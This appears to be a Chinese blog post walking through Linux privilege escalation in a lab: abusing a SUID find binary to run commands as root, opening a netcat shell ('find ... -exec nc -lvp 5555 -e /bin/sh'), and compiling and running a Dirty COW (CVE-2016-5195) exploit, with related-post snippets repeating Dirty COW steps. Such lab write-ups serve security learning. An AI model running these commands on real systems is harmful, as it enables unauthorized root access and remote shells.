Linux SUID提权&脏牛提权

最新推荐文章于 2025-04-20 22:29:16 发布
原创 最新推荐文章于 2025-04-20 22:29:16 发布
· 1k 阅读 · 0 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #运维 #服务器

文章详细介绍了如何通过设置SUID权限进行Linux提权,利用find命令寻找并执行具有SUID权限的文件以获取root权限,并展示了如何通过nc反弹shell。此外,还提及了脏牛内核漏洞的利用,包括上传检测脚本,编译和执行以实现提权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

SUID提权

suid就是set user id  。设置了SUID后,文件启动的时候就会以root的权限去运行。就是一个普通用户运行的时候,因为有SUID,所以用root权限去运行它。

加SUID权限

chmod u+x

这里开始复现。

上传Linux提权信息检测脚本LinEnum

find / -user root -perm -4000 -exec ls -ldb {} \;

这是利用find手动查找有SUID文件的命令

然后我们就要观察文件中是否存在以下文件

这里我直接拿脚本干

SUID Files 还有一个 Possible interserting SUID files

全部的SUID文件和一个可能可以利用的SUID文件

我们就利用find进行SUID提权

利用很简单

创建一个文件

touch yx
find yx -exec whoami \;


利用find文件的权限去执行whoami

 

权限root拿到了

然后再用nc反弹一个shell到攻击机,攻击机开启监听

find yx -exec nc -lvp 5555 -e /bin/sh \;

攻击机监听

nc ip port

 

这里不知道啥原因,反弹的shell还是yx

但是用本机的find执行命令可以读取配置文件

2.内核漏洞脏牛提权

这里使用墨者的靶场

连接上来后把漏洞检测的脚本上传至tmp目录运行

 下载下来是个c文件,然后传到目标主机上去

编译一下 

gcc 45010.c -o 45010

 

然后改以下可执行 +x

然后运行

权限为root

 

Linux 内核漏洞&SUID&信息收集
qi_SJQ_的博客
02-04 2957
1.Linux信息收集: Linux 自动化脚本 4个脚本(这几个项目都可以在github找到): 两个信息收集:LinEnum,linuxprivchecker 两个漏洞探针:linux-exploit-suggester ,linux-exploit-suggester2 1)LinEnum:通过webshell等限将脚本上传到/tmp目录然后执行即可(这个目录是一个临时目录,重启后会清空,一般是可以进行读写的,上传其他目录可能会因为限不够而失败)。 2)Linuxprivchecker:.
Linux---内核Linux配置错误、定时任务
qq_40012781的博客
07-03 1849
Linux---内核Linux配置错误、定时任务
xss、.zip
06-18
包含xss注入闯关小游戏和exp等干货
Linux(CVE-2016-5195)保姆级教程
weixin_68408599的博客
08-17 6519
对CVE-2016-5159的保姆级的教程
(靶机复现)
最新发布
lza20001103的博客
04-20 964
(靶机复现)
weixin_30782293的博客
04-15 634
转载自:https://www.0dayhack.com/post-691.html EXP1:dirtycow (PS:lhq123321是密码,如果成功自动生成一个firefart的管理员限账号) 转载于:https://www.cnblogs.com/zuoxiaolongzzz/p/8848062.html...
内核漏洞(CVE-2016-5195)
不曾扬帆,何以至远方
07-05 3291
漏洞、CVE-2016-5195
(1), 脱裤, dirty-cow
探测???
12-03 646
靶机: https://www.vulnhub.com/entry/lampiao-1,249/这里发现没有出现80, 1898的指纹. 1898不是常用端口, 单独扫一下看看.dirty-cow不在msf的模块库中, 所以需要在网上或者kali中单独搜索.发现1898端口开着apache, 这可能是个网站, 尝试访问网站.用浏览器访问1898端口, 发现网站页面, 观察一下页面.那么这里看到了mysql的用户名, 密码, 数据库名., 这两个是c或c++源码, 需要编译才能使用.
第63天:升-Linux内核漏洞&SUID&信息收集1
08-03
**案例4:Linux内核漏洞演示** (Dirty COW)是Linux内核中的一个严重漏洞,允许攻击者以非特用户身份修改任意读取-only内存映射文件。利用此漏洞,攻击者可以获取root限。这个过程包括使用工具如...
Linux技术:内核漏洞与SUID实战
本文档主要探讨了三个关键概念:内核漏洞、SUID限以及信息收集,并供了四个实际的案例。 1. **信息收集**: 信息收集是过程中的重要环节,它可以帮助攻击者了解系统状态,寻找潜在的漏洞。在案例1...
linux总结8大类型,30多种方式
09-27
这些方法涵盖了内核、服务、sudosuid、sgid、定时任务和nfs等。 1. **内核** - 内核通常涉及利用内核中的漏洞来获得更高的限。一种常见的方法是通过所谓的“”漏洞...
[CVE-2016-5195]linux复现
https://www.cnblogs.com/zpchcbd/
08-21 518
1、复制源代码dirty.c到可读写目录-------》 /tmp/dirty.c 2、进行gcc编译-----------------------》gcc -pthread dirty.c -o dirty -lcrypt 3、运行编译好的文件-------------------》./dirty 你设置的密码 4、如果一直卡住的话尝试反弹shell 在交互式中进行 ...
linux系统中查找可程序
a1_pha的博客
01-24 559
表示查找那些设置了 SUID(Set User ID)位的文件。当一个文件设置了 SUID 位时,用户运行该文件时将具有该文件所有者的限。这通常用于限,允许用户执行一些通常需要更高限的操作。是一个特殊的设备,会丢弃一切写入其中的数据。这个重定向操作的作用是将所有错误消息(如访问被拒绝等)重定向到。命令是一个非常强大的工具,用于在文件系统中查找符合特定条件的文件和目录。不查找目录、链接或其他类型的特殊文件。命令的一个条件表达式,用于匹配文件限。:这部分是重定向操作。及其子目录下搜索文件。
Lampiao (CVE-2016-5195)
m0_64118193的博客
08-30 915
漏洞编号漏洞名称:漏洞危害:低限用户利用该漏洞技术可以在全版本Linux系统上实现本地,获取root限影响范围:Linux内核>=2.6.22(2007年发行)开始就受了影响了,直到2016年10月18日才修复链接:靶场下载地址,取码链接:文件下载地址,码zp3j。...
vulnhub--lampiao(
鲨鱼辣椒的博客
08-03 4943
信息搜集 扫描网段确具体IP地址 扫描IP地址确定开放端口以及服务 浏览器查看网站 查看1898端口,发现另一个网站 扫描网站
[VulnHub靶机]Lampiao_
qq_45927819的博客
03-16 3729
环境介绍 攻击机:kali(192.168.56.104) 受害机:lampiao(192.168.56.107) 实验步骤 1. 扫描端口 nmap -sS -Pn -A -p- -n 192.168.56.107 开放了22、80、1898端口 2. 信息收集 80端口没什么东西,我们访问1898端口,还是先扫描一下1898端口下的目录: 这些文件等会再看,1898端口: 经过测试并不能注册用户,需要通过邮箱验证码才能设置密码,所以行不通. 查看博客的详情页面: 下图是第一篇: 第二篇:
CVE-2016-5195
weixin_30902675的博客
05-21 303
gcc -pthread dirtyc0w.c -o dirtyc0w 尝试使用gcc -pthread dirtyc0w.c -o dirtyc0w编译该POC文件 gcc命令是一个编译器套件,可用于编译多种语言源码。 可见编译选项中指定-pthread会附加一个宏定义-D_REENTRANT,该宏会导致libc头文件选择那些thread-safe的实现。-o参数为...
Linux中Find命令也能方式一文通透
weixin_51725318的博客
11-25 1586
Linux中Find命令也能方式一文通透
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值